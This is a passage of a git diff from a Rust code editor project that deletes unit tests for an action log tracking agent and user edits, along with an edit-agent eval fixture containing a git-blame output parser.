"abc\ndef\nghi\njkl\nmno"})) - .await; - let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; - let action_log = cx.new(|_| ActionLog::new(project.clone())); - let file_path = project - .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) - .unwrap(); - let buffer = project - .update(cx, |project, cx| project.open_buffer(file_path, cx)) - .await - .unwrap(); - - cx.update(|cx| { - action_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); - buffer.update(cx, |buffer, cx| { - buffer - .edit([(Point::new(1, 1)..Point::new(1, 2), "E")], None, cx) - .unwrap() - }); - buffer.update(cx, |buffer, cx| { - buffer - .edit([(Point::new(4, 2)..Point::new(4, 3), "O")], None, cx) - .unwrap() - }); - action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); - }); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.text()), - "abc\ndEf\nghi\njkl\nmnO" - ); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - vec![ - HunkStatus { - range: Point::new(1, 0)..Point::new(2, 0), - diff_status: DiffHunkStatusKind::Modified, - old_text: "def\n".into(), - }, - HunkStatus { - range: Point::new(4, 0)..Point::new(4, 3), - diff_status: DiffHunkStatusKind::Modified, - old_text: "mno".into(), - } - ], - )] - ); - - action_log.update(cx, |log, cx| { - log.keep_edits_in_range(buffer.clone(), Point::new(3, 0)..Point::new(4, 3), cx) - }); - cx.run_until_parked(); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - vec![HunkStatus { - range: Point::new(1, 0)..Point::new(2, 0), - diff_status: DiffHunkStatusKind::Modified, - old_text: "def\n".into(), - }], - )] - ); - - action_log.update(cx, |log, cx| { - log.keep_edits_in_range(buffer.clone(), Point::new(0, 0)..Point::new(4, 3), cx) - }); - cx.run_until_parked(); - assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); - } - - #[gpui::test(iterations = 10)] - async fn test_deletions(cx: &mut TestAppContext) { - init_test(cx); - - let fs = FakeFs::new(cx.executor()); - fs.insert_tree( - path!("/dir"), - json!({"file": "abc\ndef\nghi\njkl\nmno\npqr"}), - ) - .await; - let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; - let action_log = cx.new(|_| ActionLog::new(project.clone())); - let file_path = project - .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) - .unwrap(); - let buffer = project - .update(cx, |project, cx| project.open_buffer(file_path, cx)) - .await - .unwrap(); - - cx.update(|cx| { - action_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); - buffer.update(cx, |buffer, cx| { - buffer - .edit([(Point::new(1, 0)..Point::new(2, 0), "")], None, cx) - .unwrap(); - buffer.finalize_last_transaction(); - }); - buffer.update(cx, |buffer, cx| { - buffer - .edit([(Point::new(3, 0)..Point::new(4, 0), "")], None, cx) - .unwrap(); - buffer.finalize_last_transaction(); - }); - action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); - }); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.text()), - "abc\nghi\njkl\npqr" - ); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - vec![ - HunkStatus { - range: Point::new(1, 0)..Point::new(1, 0), - diff_status: DiffHunkStatusKind::Deleted, - old_text: "def\n".into(), - }, - HunkStatus { - range: Point::new(3, 0)..Point::new(3, 0), - diff_status: DiffHunkStatusKind::Deleted, - old_text: "mno\n".into(), - } - ], - )] - ); - - buffer.update(cx, |buffer, cx| buffer.undo(cx)); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.text()), - "abc\nghi\njkl\nmno\npqr" - ); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - vec![HunkStatus { - range: Point::new(1, 0)..Point::new(1, 0), - diff_status: DiffHunkStatusKind::Deleted, - old_text: "def\n".into(), - }], - )] - ); - - action_log.update(cx, |log, cx| { - log.keep_edits_in_range(buffer.clone(), Point::new(1, 0)..Point::new(1, 0), cx) - }); - cx.run_until_parked(); - assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); - } - - #[gpui::test(iterations = 10)] - async fn test_overlapping_user_edits(cx: &mut TestAppContext) { - init_test(cx); - - let fs = FakeFs::new(cx.executor()); - fs.insert_tree(path!("/dir"), json!({"file": "abc\ndef\nghi\njkl\nmno"})) - .await; - let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; - let action_log = cx.new(|_| ActionLog::new(project.clone())); - let file_path = project - .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) - .unwrap(); - let buffer = project - .update(cx, |project, cx| project.open_buffer(file_path, cx)) - .await - .unwrap(); - - cx.update(|cx| { - action_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); - buffer.update(cx, |buffer, cx| { - buffer - .edit([(Point::new(1, 2)..Point::new(2, 3), "F\nGHI")], None, cx) - .unwrap() - }); - action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); - }); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.text()), - "abc\ndeF\nGHI\njkl\nmno" - ); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - vec![HunkStatus { - range: Point::new(1, 0)..Point::new(3, 0), - diff_status: DiffHunkStatusKind::Modified, - old_text: "def\nghi\n".into(), - }], - )] - ); - - buffer.update(cx, |buffer, cx| { - buffer.edit( - [ - (Point::new(0, 2)..Point::new(0, 2), "X"), - (Point::new(3, 0)..Point::new(3, 0), "Y"), - ], - None, - cx, - ) - }); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.text()), - "abXc\ndeF\nGHI\nYjkl\nmno" - ); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - vec![HunkStatus { - range: Point::new(1, 0)..Point::new(3, 0), - diff_status: DiffHunkStatusKind::Modified, - old_text: "def\nghi\n".into(), - }], - )] - ); - - buffer.update(cx, |buffer, cx| { - buffer.edit([(Point::new(1, 1)..Point::new(1, 1), "Z")], None, cx) - }); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.text()), - "abXc\ndZeF\nGHI\nYjkl\nmno" - ); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - vec![HunkStatus { - range: Point::new(1, 0)..Point::new(3, 0), - diff_status: DiffHunkStatusKind::Modified, - old_text: "def\nghi\n".into(), - }], - )] - ); - - action_log.update(cx, |log, cx| { - log.keep_edits_in_range(buffer.clone(), Point::new(0, 0)..Point::new(1, 0), cx) - }); - cx.run_until_parked(); - assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); - } - - #[gpui::test(iterations = 10)] - async fn test_creating_files(cx: &mut TestAppContext) { - init_test(cx); - - let fs = FakeFs::new(cx.executor()); - fs.insert_tree(path!("/dir"), json!({})).await; - let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; - let action_log = cx.new(|_| ActionLog::new(project.clone())); - let file_path = project - .read_with(cx, |project, cx| project.find_project_path("dir/file1", cx)) - .unwrap(); - - let buffer = project - .update(cx, |project, cx| project.open_buffer(file_path, cx)) - .await - .unwrap(); - cx.update(|cx| { - action_log.update(cx, |log, cx| log.buffer_created(buffer.clone(), cx)); - buffer.update(cx, |buffer, cx| buffer.set_text("lorem", cx)); - action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); - }); - project - .update(cx, |project, cx| project.save_buffer(buffer.clone(), cx)) - .await - .unwrap(); - cx.run_until_parked(); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - vec![HunkStatus { - range: Point::new(0, 0)..Point::new(0, 5), - diff_status: DiffHunkStatusKind::Added, - old_text: "".into(), - }], - )] - ); - - buffer.update(cx, |buffer, cx| buffer.edit([(0..0, "X")], None, cx)); - cx.run_until_parked(); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - vec![HunkStatus { - range: Point::new(0, 0)..Point::new(0, 6), - diff_status: DiffHunkStatusKind::Added, - old_text: "".into(), - }], - )] - ); - - action_log.update(cx, |log, cx| { - log.keep_edits_in_range(buffer.clone(), 0..5, cx) - }); - cx.run_until_parked(); - assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); - } - - #[gpui::test(iterations = 10)] - async fn test_deleting_files(cx: &mut TestAppContext) { - init_test(cx); - - let fs = FakeFs::new(cx.executor()); - fs.insert_tree( - path!("/dir"), - json!({"file1": "lorem\n", "file2": "ipsum\n"}), - ) - .await; - - let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; - let file1_path = project - .read_with(cx, |project, cx| project.find_project_path("dir/file1", cx)) - .unwrap(); - let file2_path = project - .read_with(cx, |project, cx| project.find_project_path("dir/file2", cx)) - .unwrap(); - - let action_log = cx.new(|_| ActionLog::new(project.clone())); - let buffer1 = project - .update(cx, |project, cx| { - project.open_buffer(file1_path.clone(), cx) - }) - .await - .unwrap(); - let buffer2 = project - .update(cx, |project, cx| { - project.open_buffer(file2_path.clone(), cx) - }) - .await - .unwrap(); - - action_log.update(cx, |log, cx| log.will_delete_buffer(buffer1.clone(), cx)); - action_log.update(cx, |log, cx| log.will_delete_buffer(buffer2.clone(), cx)); - project - .update(cx, |project, cx| { - project.delete_file(file1_path.clone(), false, cx) - }) - .unwrap() - .await - .unwrap(); - project - .update(cx, |project, cx| { - project.delete_file(file2_path.clone(), false, cx) - }) - .unwrap() - .await - .unwrap(); - cx.run_until_parked(); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![ - ( - buffer1.clone(), - vec![HunkStatus { - range: Point::new(0, 0)..Point::new(0, 0), - diff_status: DiffHunkStatusKind::Deleted, - old_text: "lorem\n".into(), - }] - ), - ( - buffer2.clone(), - vec![HunkStatus { - range: Point::new(0, 0)..Point::new(0, 0), - diff_status: DiffHunkStatusKind::Deleted, - old_text: "ipsum\n".into(), - }], - ) - ] - ); - - // Simulate file1 being recreated externally. - fs.insert_file(path!("/dir/file1"), "LOREM".as_bytes().to_vec()) - .await; - - // Simulate file2 being recreated by a tool. - let buffer2 = project - .update(cx, |project, cx| project.open_buffer(file2_path, cx)) - .await - .unwrap(); - action_log.update(cx, |log, cx| log.buffer_read(buffer2.clone(), cx)); - buffer2.update(cx, |buffer, cx| buffer.set_text("IPSUM", cx)); - action_log.update(cx, |log, cx| log.buffer_edited(buffer2.clone(), cx)); - project - .update(cx, |project, cx| project.save_buffer(buffer2.clone(), cx)) - .await - .unwrap(); - - cx.run_until_parked(); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer2.clone(), - vec![HunkStatus { - range: Point::new(0, 0)..Point::new(0, 5), - diff_status: DiffHunkStatusKind::Modified, - old_text: "ipsum\n".into(), - }], - )] - ); - - // Simulate file2 being deleted externally. - fs.remove_file(path!("/dir/file2").as_ref(), RemoveOptions::default()) - .await - .unwrap(); - cx.run_until_parked(); - assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); - } - - #[gpui::test(iterations = 10)] - async fn test_reject_edits(cx: &mut TestAppContext) { - init_test(cx); - - let fs = FakeFs::new(cx.executor()); - fs.insert_tree(path!("/dir"), json!({"file": "abc\ndef\nghi\njkl\nmno"})) - .await; - let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; - let action_log = cx.new(|_| ActionLog::new(project.clone())); - let file_path = project - .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) - .unwrap(); - let buffer = project - .update(cx, |project, cx| project.open_buffer(file_path, cx)) - .await - .unwrap(); - - cx.update(|cx| { - action_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); - buffer.update(cx, |buffer, cx| { - buffer - .edit([(Point::new(1, 1)..Point::new(1, 2), "E\nXYZ")], None, cx) - .unwrap() - }); - buffer.update(cx, |buffer, cx| { - buffer - .edit([(Point::new(5, 2)..Point::new(5, 3), "O")], None, cx) - .unwrap() - }); - action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); - }); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.text()), - "abc\ndE\nXYZf\nghi\njkl\nmnO" - ); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - vec![ - HunkStatus { - range: Point::new(1, 0)..Point::new(3, 0), - diff_status: DiffHunkStatusKind::Modified, - old_text: "def\n".into(), - }, - HunkStatus { - range: Point::new(5, 0)..Point::new(5, 3), - diff_status: DiffHunkStatusKind::Modified, - old_text: "mno".into(), - } - ], - )] - ); - - // If the rejected range doesn't overlap with any hunk, we ignore it. - action_log - .update(cx, |log, cx| { - log.reject_edits_in_ranges( - buffer.clone(), - vec![Point::new(4, 0)..Point::new(4, 0)], - cx, - ) - }) - .await - .unwrap(); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.text()), - "abc\ndE\nXYZf\nghi\njkl\nmnO" - ); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - vec![ - HunkStatus { - range: Point::new(1, 0)..Point::new(3, 0), - diff_status: DiffHunkStatusKind::Modified, - old_text: "def\n".into(), - }, - HunkStatus { - range: Point::new(5, 0)..Point::new(5, 3), - diff_status: DiffHunkStatusKind::Modified, - old_text: "mno".into(), - } - ], - )] - ); - - action_log - .update(cx, |log, cx| { - log.reject_edits_in_ranges( - buffer.clone(), - vec![Point::new(0, 0)..Point::new(1, 0)], - cx, - ) - }) - .await - .unwrap(); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.text()), - "abc\ndef\nghi\njkl\nmnO" - ); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - vec![HunkStatus { - range: Point::new(4, 0)..Point::new(4, 3), - diff_status: DiffHunkStatusKind::Modified, - old_text: "mno".into(), - }], - )] - ); - - action_log - .update(cx, |log, cx| { - log.reject_edits_in_ranges( - buffer.clone(), - vec![Point::new(4, 0)..Point::new(4, 0)], - cx, - ) - }) - .await - .unwrap(); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.text()), - "abc\ndef\nghi\njkl\nmno" - ); - assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); - } - - #[gpui::test(iterations = 10)] - async fn test_reject_multiple_edits(cx: &mut TestAppContext) { - init_test(cx); - - let fs = FakeFs::new(cx.executor()); - fs.insert_tree(path!("/dir"), json!({"file": "abc\ndef\nghi\njkl\nmno"})) - .await; - let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; - let action_log = cx.new(|_| ActionLog::new(project.clone())); - let file_path = project - .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) - .unwrap(); - let buffer = project - .update(cx, |project, cx| project.open_buffer(file_path, cx)) - .await - .unwrap(); - - cx.update(|cx| { - action_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); - buffer.update(cx, |buffer, cx| { - buffer - .edit([(Point::new(1, 1)..Point::new(1, 2), "E\nXYZ")], None, cx) - .unwrap() - }); - buffer.update(cx, |buffer, cx| { - buffer - .edit([(Point::new(5, 2)..Point::new(5, 3), "O")], None, cx) - .unwrap() - }); - action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); - }); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.text()), - "abc\ndE\nXYZf\nghi\njkl\nmnO" - ); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - vec![ - HunkStatus { - range: Point::new(1, 0)..Point::new(3, 0), - diff_status: DiffHunkStatusKind::Modified, - old_text: "def\n".into(), - }, - HunkStatus { - range: Point::new(5, 0)..Point::new(5, 3), - diff_status: DiffHunkStatusKind::Modified, - old_text: "mno".into(), - } - ], - )] - ); - - action_log.update(cx, |log, cx| { - let range_1 = buffer.read(cx).anchor_before(Point::new(0, 0)) - ..buffer.read(cx).anchor_before(Point::new(1, 0)); - let range_2 = buffer.read(cx).anchor_before(Point::new(5, 0)) - ..buffer.read(cx).anchor_before(Point::new(5, 3)); - - log.reject_edits_in_ranges(buffer.clone(), vec![range_1, range_2], cx) - .detach(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.text()), - "abc\ndef\nghi\njkl\nmno" - ); - }); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.text()), - "abc\ndef\nghi\njkl\nmno" - ); - assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); - } - - #[gpui::test(iterations = 10)] - async fn test_reject_deleted_file(cx: &mut TestAppContext) { - init_test(cx); - - let fs = FakeFs::new(cx.executor()); - fs.insert_tree(path!("/dir"), json!({"file": "content"})) - .await; - let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; - let action_log = cx.new(|_| ActionLog::new(project.clone())); - let file_path = project - .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) - .unwrap(); - let buffer = project - .update(cx, |project, cx| project.open_buffer(file_path.clone(), cx)) - .await - .unwrap(); - - cx.update(|cx| { - action_log.update(cx, |log, cx| log.will_delete_buffer(buffer.clone(), cx)); - }); - project - .update(cx, |project, cx| { - project.delete_file(file_path.clone(), false, cx) - }) - .unwrap() - .await - .unwrap(); - cx.run_until_parked(); - assert!(!fs.is_file(path!("/dir/file").as_ref()).await); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - vec![HunkStatus { - range: Point::new(0, 0)..Point::new(0, 0), - diff_status: DiffHunkStatusKind::Deleted, - old_text: "content".into(), - }] - )] - ); - - action_log - .update(cx, |log, cx| { - log.reject_edits_in_ranges( - buffer.clone(), - vec![Point::new(0, 0)..Point::new(0, 0)], - cx, - ) - }) - .await - .unwrap(); - cx.run_until_parked(); - assert_eq!(buffer.read_with(cx, |buffer, _| buffer.text()), "content"); - assert!(fs.is_file(path!("/dir/file").as_ref()).await); - assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); - } - - #[gpui::test(iterations = 10)] - async fn test_reject_created_file(cx: &mut TestAppContext) { - init_test(cx); - - let fs = FakeFs::new(cx.executor()); - let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; - let action_log = cx.new(|_| ActionLog::new(project.clone())); - let file_path = project - .read_with(cx, |project, cx| { - project.find_project_path("dir/new_file", cx) - }) - .unwrap(); - - let buffer = project - .update(cx, |project, cx| project.open_buffer(file_path, cx)) - .await - .unwrap(); - cx.update(|cx| { - action_log.update(cx, |log, cx| log.buffer_created(buffer.clone(), cx)); - buffer.update(cx, |buffer, cx| buffer.set_text("content", cx)); - action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); - }); - project - .update(cx, |project, cx| project.save_buffer(buffer.clone(), cx)) - .await - .unwrap(); - assert!(fs.is_file(path!("/dir/new_file").as_ref()).await); - cx.run_until_parked(); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - vec![HunkStatus { - range: Point::new(0, 0)..Point::new(0, 7), - diff_status: DiffHunkStatusKind::Added, - old_text: "".into(), - }], - )] - ); - - action_log - .update(cx, |log, cx| { - log.reject_edits_in_ranges( - buffer.clone(), - vec![Point::new(0, 0)..Point::new(0, 11)], - cx, - ) - }) - .await - .unwrap(); - cx.run_until_parked(); - assert!(!fs.is_file(path!("/dir/new_file").as_ref()).await); - assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); - } - - #[gpui::test(iterations = 100)] - async fn test_random_diffs(mut rng: StdRng, cx: &mut TestAppContext) { - init_test(cx); - - let operations = env::var("OPERATIONS") - .map(|i| i.parse().expect("invalid `OPERATIONS` variable")) - .unwrap_or(20); - - let text = RandomCharIter::new(&mut rng).take(50).collect::(); - let fs = FakeFs::new(cx.executor()); - fs.insert_tree(path!("/dir"), json!({"file": text})).await; - let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; - let action_log = cx.new(|_| ActionLog::new(project.clone())); - let file_path = project - .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) - .unwrap(); - let buffer = project - .update(cx, |project, cx| project.open_buffer(file_path, cx)) - .await - .unwrap(); - - action_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); - - for _ in 0..operations { - match rng.gen_range(0..100) { - 0..25 => { - action_log.update(cx, |log, cx| { - let range = buffer.read(cx).random_byte_range(0, &mut rng); - log::info!("keeping edits in range {:?}", range); - log.keep_edits_in_range(buffer.clone(), range, cx) - }); - } - 25..50 => { - action_log - .update(cx, |log, cx| { - let range = buffer.read(cx).random_byte_range(0, &mut rng); - log::info!("rejecting edits in range {:?}", range); - log.reject_edits_in_ranges(buffer.clone(), vec![range], cx) - }) - .await - .unwrap(); - } - _ => { - let is_agent_change = rng.gen_bool(0.5); - if is_agent_change { - log::info!("agent edit"); - } else { - log::info!("user edit"); - } - cx.update(|cx| { - buffer.update(cx, |buffer, cx| buffer.randomly_edit(&mut rng, 1, cx)); - if is_agent_change { - action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); - } - }); - } - } - - if rng.gen_bool(0.2) { - quiesce(&action_log, &buffer, cx); - } - } - - quiesce(&action_log, &buffer, cx); - - fn quiesce( - action_log: &Entity, - buffer: &Entity, - cx: &mut TestAppContext, - ) { - log::info!("quiescing..."); - cx.run_until_parked(); - action_log.update(cx, |log, cx| { - let tracked_buffer = log.tracked_buffers.get(&buffer).unwrap(); - let mut old_text = tracked_buffer.base_text.clone(); - let new_text = buffer.read(cx).as_rope(); - for edit in tracked_buffer.unreviewed_changes.edits() { - let old_start = old_text.point_to_offset(Point::new(edit.new.start, 0)); - let old_end = old_text.point_to_offset(cmp::min( - Point::new(edit.new.start + edit.old_len(), 0), - old_text.max_point(), - )); - old_text.replace( - old_start..old_end, - &new_text.slice_rows(edit.new.clone()).to_string(), - ); - } - pretty_assertions::assert_eq!(old_text.to_string(), new_text.to_string()); - }) - } - } - - #[derive(Debug, Clone, PartialEq, Eq)] - struct HunkStatus { - range: Range, - diff_status: DiffHunkStatusKind, - old_text: String, - } - - fn unreviewed_hunks( - action_log: &Entity, - cx: &TestAppContext, - ) -> Vec<(Entity, Vec)> { - cx.read(|cx| { - action_log - .read(cx) - .changed_buffers(cx) - .into_iter() - .map(|(buffer, diff)| { - let snapshot = buffer.read(cx).snapshot(); - ( - buffer, - diff.read(cx) - .hunks(&snapshot, cx) - .map(|hunk| HunkStatus { - diff_status: hunk.status().kind, - range: hunk.range, - old_text: diff - .read(cx) - .base_text() - .text_for_range(hunk.diff_base_byte_range) - .collect(), - }) - .collect(), - ) - }) - .collect() - }) - } -} diff --git a/crates/agent/src/edit_agent/evals/fixtures/delete_run_git_blame/after.rs b/crates/agent/src/edit_agent/evals/fixtures/delete_run_git_blame/after.rs deleted file mode 100644 index 89277be4436bf0..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/delete_run_git_blame/after.rs +++ /dev/null @@ -1,328 +0,0 @@ -use crate::commit::get_messages; -use crate::{GitRemote, Oid}; -use anyhow::{Context as _, Result, anyhow}; -use collections::{HashMap, HashSet}; -use futures::AsyncWriteExt; -use gpui::SharedString; -use serde::{Deserialize, Serialize}; -use std::process::Stdio; -use std::{ops::Range, path::Path}; -use text::Rope; -use time::OffsetDateTime; -use time::UtcOffset; -use time::macros::format_description; - -pub use git2 as libgit; - -#[derive(Debug, Clone, Default)] -pub struct Blame { - pub entries: Vec, - pub messages: HashMap, - pub remote_url: Option, -} - -#[derive(Clone, Debug, Default)] -pub struct ParsedCommitMessage { - pub message: SharedString, - pub permalink: Option, - pub pull_request: Option, - pub remote: Option, -} - -impl Blame { - pub async fn for_path( - git_binary: &Path, - working_directory: &Path, - path: &Path, - content: &Rope, - remote_url: Option, - ) -> Result { - let output = run_git_blame(git_binary, working_directory, path, content).await?; - let mut entries = parse_git_blame(&output)?; - entries.sort_unstable_by(|a, b| a.range.start.cmp(&b.range.start)); - - let mut unique_shas = HashSet::default(); - - for entry in entries.iter_mut() { - unique_shas.insert(entry.sha); - } - - let shas = unique_shas.into_iter().collect::>(); - let messages = get_messages(working_directory, &shas) - .await - .context("failed to get commit messages")?; - - Ok(Self { - entries, - messages, - remote_url, - }) - } -} - -const GIT_BLAME_NO_COMMIT_ERROR: &str = "fatal: no such ref: HEAD"; -const GIT_BLAME_NO_PATH: &str = "fatal: no such path"; - -#[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] -pub struct BlameEntry { - pub sha: Oid, - - pub range: Range, - - pub original_line_number: u32, - - pub author: Option, - pub author_mail: Option, - pub author_time: Option, - pub author_tz: Option, - - pub committer_name: Option, - pub committer_email: Option, - pub committer_time: Option, - pub committer_tz: Option, - - pub summary: Option, - - pub previous: Option, - pub filename: String, -} - -impl BlameEntry { - // Returns a BlameEntry by parsing the first line of a `git blame --incremental` - // entry. The line MUST have this format: - // - // <40-byte-hex-sha1> - fn new_from_blame_line(line: &str) -> Result { - let mut parts = line.split_whitespace(); - - let sha = parts - .next() - .and_then(|line| line.parse::().ok()) - .with_context(|| format!("parsing sha from {line}"))?; - - let original_line_number = parts - .next() - .and_then(|line| line.parse::().ok()) - .with_context(|| format!("parsing original line number from {line}"))?; - let final_line_number = parts - .next() - .and_then(|line| line.parse::().ok()) - .with_context(|| format!("parsing final line number from {line}"))?; - - let line_count = parts - .next() - .and_then(|line| line.parse::().ok()) - .with_context(|| format!("parsing line count from {line}"))?; - - let start_line = final_line_number.saturating_sub(1); - let end_line = start_line + line_count; - let range = start_line..end_line; - - Ok(Self { - sha, - range, - original_line_number, - ..Default::default() - }) - } - - pub fn author_offset_date_time(&self) -> Result { - if let (Some(author_time), Some(author_tz)) = (self.author_time, &self.author_tz) { - let format = format_description!("[offset_hour][offset_minute]"); - let offset = UtcOffset::parse(author_tz, &format)?; - let date_time_utc = OffsetDateTime::from_unix_timestamp(author_time)?; - - Ok(date_time_utc.to_offset(offset)) - } else { - // Directly return current time in UTC if there's no committer time or timezone - Ok(time::OffsetDateTime::now_utc()) - } - } -} - -// parse_git_blame parses the output of `git blame --incremental`, which returns -// all the blame-entries for a given path incrementally, as it finds them. -// -// Each entry *always* starts with: -// -// <40-byte-hex-sha1> -// -// Each entry *always* ends with: -// -// filename -// -// Line numbers are 1-indexed. -// -// A `git blame --incremental` entry looks like this: -// -// 6ad46b5257ba16d12c5ca9f0d4900320959df7f4 2 2 1 -// author Joe Schmoe -// author-mail -// author-time 1709741400 -// author-tz +0100 -// committer Joe Schmoe -// committer-mail -// committer-time 1709741400 -// committer-tz +0100 -// summary Joe's cool commit -// previous 486c2409237a2c627230589e567024a96751d475 index.js -// filename index.js -// -// If the entry has the same SHA as an entry that was already printed then no -// signature information is printed: -// -// 6ad46b5257ba16d12c5ca9f0d4900320959df7f4 3 4 1 -// previous 486c2409237a2c627230589e567024a96751d475 index.js -// filename index.js -// -// More about `--incremental` output: https://mirrors.edge.kernel.org/pub/software/scm/git/docs/git-blame.html -fn parse_git_blame(output: &str) -> Result> { - let mut entries: Vec = Vec::new(); - let mut index: HashMap = HashMap::default(); - - let mut current_entry: Option = None; - - for line in output.lines() { - let mut done = false; - - match &mut current_entry { - None => { - let mut new_entry = BlameEntry::new_from_blame_line(line)?; - - if let Some(existing_entry) = index - .get(&new_entry.sha) - .and_then(|slot| entries.get(*slot)) - { - new_entry.author.clone_from(&existing_entry.author); - new_entry - .author_mail - .clone_from(&existing_entry.author_mail); - new_entry.author_time = existing_entry.author_time; - new_entry.author_tz.clone_from(&existing_entry.author_tz); - new_entry - .committer_name - .clone_from(&existing_entry.committer_name); - new_entry - .committer_email - .clone_from(&existing_entry.committer_email); - new_entry.committer_time = existing_entry.committer_time; - new_entry - .committer_tz - .clone_from(&existing_entry.committer_tz); - new_entry.summary.clone_from(&existing_entry.summary); - } - - current_entry.replace(new_entry); - } - Some(entry) => { - let Some((key, value)) = line.split_once(' ') else { - continue; - }; - let is_committed = !entry.sha.is_zero(); - match key { - "filename" => { - entry.filename = value.into(); - done = true; - } - "previous" => entry.previous = Some(value.into()), - - "summary" if is_committed => entry.summary = Some(value.into()), - "author" if is_committed => entry.author = Some(value.into()), - "author-mail" if is_committed => entry.author_mail = Some(value.into()), - "author-time" if is_committed => { - entry.author_time = Some(value.parse::()?) - } - "author-tz" if is_committed => entry.author_tz = Some(value.into()), - - "committer" if is_committed => entry.committer_name = Some(value.into()), - "committer-mail" if is_committed => entry.committer_email = Some(value.into()), - "committer-time" if is_committed => { - entry.committer_time = Some(value.parse::()?) - } - "committer-tz" if is_committed => entry.committer_tz = Some(value.into()), - _ => {} - } - } - }; - - if done { - if let Some(entry) = current_entry.take() { - index.insert(entry.sha, entries.len()); - - // We only want annotations that have a commit. - if !entry.sha.is_zero() { - entries.push(entry); - } - } - } - } - - Ok(entries) -} - -#[cfg(test)] -mod tests { - use std::path::PathBuf; - - use super::BlameEntry; - use super::parse_git_blame; - - fn read_test_data(filename: &str) -> String { - let mut path = PathBuf::from(env!("CARGO_MANIFEST_DIR")); - path.push("test_data"); - path.push(filename); - - std::fs::read_to_string(&path) - .unwrap_or_else(|_| panic!("Could not read test data at {:?}. Is it generated?", path)) - } - - fn assert_eq_golden(entries: &Vec, golden_filename: &str) { - let mut path = PathBuf::from(env!("CARGO_MANIFEST_DIR")); - path.push("test_data"); - path.push("golden"); - path.push(format!("{}.json", golden_filename)); - - let mut have_json = - serde_json::to_string_pretty(&entries).expect("could not serialize entries to JSON"); - // We always want to save with a trailing newline. - have_json.push('\n'); - - let update = std::env::var("UPDATE_GOLDEN") - .map(|val| 